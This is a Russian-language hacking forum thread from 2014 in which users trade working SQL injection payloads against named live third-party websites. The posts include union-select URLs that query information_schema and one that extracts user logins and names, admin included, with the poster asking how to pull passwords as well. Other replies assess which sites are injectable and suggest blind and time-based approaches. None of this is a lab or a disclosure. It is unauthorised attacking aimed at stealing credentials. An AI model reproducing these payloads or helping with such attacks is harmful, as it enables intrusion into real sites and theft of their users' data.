HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.08.2014, 21:32
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Shade  
а вот еще вопросик. Чего он не показывает мне таблички?
Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше
Код:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12+from+information_shema.tables+--+
Найди отличия

Цитата:
Сообщение от None  
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_schema.tables+--
 
Ответить с цитированием

  #2  
Старый 07.08.2014, 21:34
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ravenous  
Найди отличия
о мой бог) я безграммотный чудила.. благодарю
 
Ответить с цитированием

  #3  
Старый 09.08.2014, 00:31
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)

Код:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)
 
Ответить с цитированием

  #4  
Старый 09.08.2014, 00:36
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Shade  
Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)
Код:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)
Тут и подавно не пахнет никакой инъекцией.

И вообще это Drupal) Можешь проходить мимо)
 
Ответить с цитированием

  #5  
Старый 10.08.2014, 18:44
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=r eply_post&t=31212&f=7

Мысли-идеи ? =)
 
Ответить с цитированием

  #6  
Старый 10.08.2014, 19:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Cennarios  
http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=r eply_post&t=31212&f=7
Мысли-идеи ? =)
babyplan@internal-www

Вот тут-то точно по учебнику. Слепая, временнАя и union в двадцать колонок без вывода(?). Впрочем, если сделать регу, то, возможно, вывод таки будет.

403 при выполненном запросе, 500 при ошибочном.
 
Ответить с цитированием

  #7  
Старый 10.08.2014, 19:27
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
 
Ответить с цитированием

  #8  
Старый 10.08.2014, 21:11
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Cennarios  
Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
А вы не думали, что information_schema просто недоступна для этого юзера, не?
 
Ответить с цитированием

  #9  
Старый 11.08.2014, 01:01
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Цитата:
Сообщение от madhatter  
А вы не думали, что information_schema просто недоступна для этого юзера, не?
Не будьте голословны, аргументируйте свое утверждение по поводу кодов ошибки рабочими примерами реквестов

Дело в том что запос падает на любом вхождении SELECT, наверняка как-то можно обойти
 
Ответить с цитированием

  #10  
Старый 11.08.2014, 11:55
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

начал раскручивать скулю.. и столкнулся с такой проблемой

нашел 3 интерисующих меня стобца:

usr_login

usr_name

usr_pass

При запросе:

Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.

А при запросе:

Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).

Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.